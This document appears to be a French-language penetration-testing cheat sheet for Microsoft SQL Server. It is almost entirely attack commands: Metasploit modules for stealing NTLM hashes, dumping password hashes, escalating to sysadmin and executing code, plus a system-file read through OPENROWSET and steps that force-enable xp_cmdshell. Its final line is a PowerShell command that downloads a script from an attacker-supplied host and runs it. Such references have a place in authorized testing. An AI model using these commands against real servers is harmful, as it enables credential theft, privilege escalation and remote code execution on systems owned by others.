#Vol de NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
#Execution de code
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload
#Ajouter un nouvel administrateur depuis une session meterpreter
msf> use windows/manage/mssql_local_auth_bypass
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Exécution de code
Pour executer du code sur MSSQL, il faut que xp_cmdshell soit activé. Si il ne l'est pas, il est possible de forcer son activation avec les droits suffisants.
Vérification
> xp_cmdshell `whoami`;
> go
Activer xp_cmdshell
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell `whoami`;
> go
Forcer l'activation
> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go
> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go
> xp_cmdshell 'whoami';
> go
Téléchargement de fichier
> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go
